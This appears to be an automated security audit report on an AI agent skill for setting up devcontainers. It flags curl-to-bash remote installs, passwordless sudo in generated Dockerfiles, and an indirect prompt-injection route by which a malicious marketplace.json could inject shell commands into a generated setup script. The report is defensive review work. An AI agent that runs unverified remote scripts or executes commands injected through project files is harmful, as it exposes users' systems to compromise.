setting-up-devcontainers
Warn
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: MEDIUMEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION] (MEDIUM): The skill references recommend installing software using the
curl | bashpattern from domains likeclaude.aiandget.volta.sh. While common for these tools, executing unverified remote scripts with shell privileges is a high-risk pattern. Severity is adjusted due to its alignment with the skill's primary setup purpose. - [COMMAND_EXECUTION] (MEDIUM): Generated Dockerfile templates grant passwordless sudo access (
NOPASSWD:ALL) to the container user. This is a common devcontainer practice but increases the security impact of any compromised tool or script within the environment. - [PROMPT_INJECTION] (LOW): Indirect Prompt Injection surface: The skill processes a local
marketplace.jsonfile to generate setup scripts. Malicious content in this project file could potentially inject shell commands into thepost-create.shscript via unvalidated placeholders. [Evidence Chain - Ingestion: marketplace.json; Boundary markers: None identified in templates; Capability inventory: Shell script generation and execution; Sanitization: No sanitization logic found for project-provided metadata placeholders].
Audit Metadata